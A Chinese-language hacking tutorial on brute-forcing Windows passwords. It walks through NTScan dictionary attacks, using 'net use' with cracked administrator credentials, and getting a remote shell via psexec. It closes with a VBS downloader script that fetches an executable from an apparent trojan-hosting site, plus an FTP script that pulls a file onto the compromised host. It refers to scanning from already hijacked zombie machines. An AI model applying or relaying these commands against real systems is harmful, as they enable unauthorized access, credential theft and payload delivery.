口令扫描攻击有两种方式
- 一种是不知道用户名称,猜测性暴力攻击
- 另一种是通过各种工具或手段收集用户信息,利用收集的信息实施攻击
口令扫描获取用户的账号名称方法
-
利用网络工具获取:
可以利用目标主机的finger命令查询功能获取信息。当使用finger命令时,主机系统会将保存的用户资料(用户名,登陆时间)显示在终端或计算机上 -
通过网络获取用户相关信息:
用户通常使用相同的名字注册电子邮箱、blog即论坛 -
获取主机中的习惯性账号:
习惯性账号主要包括操作系统账号和应用软件账号。在操作系统账号中,又分为windows账号和linux/nuix账号。在linux/nuix操作系统中。用户信息存放在passwd中,口令经过des加密放在shadow中 -
通过网络监听得到用户口令
-
通过软件获取:
在获得一定的shell后,可以通过PwBump、LC5、NTCrack、MT、ADUMP等工具获取系统账号命令
使用NTScan扫描Windows口令
前提:用户开启admin$文件共享
运行regedit,进入下面键值:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters,新建AutoShareWks,以及AutoShareServer两个键值,选择REG_DWORD格式,赋值为1HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa新建restrictanonymous,dword,赋值1。然后重启,通过运行CMD命令进入命令行模式,再运行net share,在共享列表中会看到Admin$、C$\IPC$ |
Windows口令扫描攻击主要针对某个IP地址或者网段进行口令扫描,实质是通过139、445等端口尝试建立连接,利用DOS命令“net use \ipaddress\admin$ “password” /u:user”,只不过是通过程序实现而已
01设置NTScan
运行NTScan,在NTScan中一班指需要设置开始IP地址和结束IP地址,其他设置均采用默认值
如图
(1)如果是在肉机上进行口令扫描,由于语言版本不同,若操作系统不支持响应语言的显示,就有可能显示为乱码,这时只能凭对系统的熟悉程度进行设置。
(2)在NTScan中有IPC、SMB和WMI 3种扫描方式,第一种和第三种扫描口令较为有效,第二种主要用来扫描共享文件。利用IPC$可以与目标主机建立一个空的连接而无需用户名和密码,还可以得到目标主机上的用户列表。SMB(服务器信息块)协议是一种IBM协议,用于在计算机间共享文件、打印机、串口等。SMB协议可以用在因特网的TCP/IP协议之上,也可以用在其他网络协议,如IPX和NetBEUI之上。
(3)WMI(windows管理规范)是windows的一项核心管理技术。作为一种规范和基础结构,通过WMI可以访问、配置、管理和监视几乎所有Windows资源
02执行扫描
在NTScan运行界面单击“开始”按钮
(1)NTScan扫描口令与字典有关,其原理就是使用字典中的口令与实际口令进行对比,如果相同即可建立连接,即爆破成功,破解成功后会在下方显示。
(2)NTScan的字典为NT_pass.dic,用户名为NT_user.dic,可以根据实际情况对字典文件和用户文件的内容进行修改。
(3)NTScan扫描结束后,会在NTScan程序的当前目录下生成一个NTScan.txt文件,该文件用于记录扫描结果。
(4)在NTScan中还有一些辅助功能,如单击“右键”可以执行“cmd”命令,单击左键后可以执行“连接”、“打开远程登录”及“映射网络驱动器”等命令。
03实时控制
在DOS命令提示符下输入net use \\192.168.38.134\ipc$ "win2003luo" /u:administrator
命令获取主机的管理员权限
04执行Psexec命令
输入psexec \\192.168.38.134 cmd
命令,获取一个DOSShell
安装psexec.exe:将psexec.exe文件放在windows\system32目录下并运行即可 |
---|
以上两步可以合并。在DOS命令提示符下输入
psexec \\192.168.38.134 u administrator -pwin2003luo cmd
获取DOS下的shell
05从远端查看被入侵计算机的端口开放情况
使用sfind -p 192.168.38.134
命令一次查看远程主机端口开放情况
06上传文件
07查看主机基本信息
代码:systeminfo
说明:
(1)可以使用一下VBS脚本命令上传文件
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo web.responseboby:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe http://www.mymuma.com/software/systeminfo.exe systeminfo.exe
(2)如果不能通过执行VBS脚本上传文件,可以通过执行FTP命令上传文件
echo open 192.168.1.1 >b
echo ftp>>b
echo ftp>>b
echo bin>>b
echo get systeminfo.exe >>b
echo bye >>b
ftp -s:b
(3)上传文件时,建议先使用“dir filename”命令查看文件是否存在,上传后再次通过“dir filename”命令查看文件是否上传成功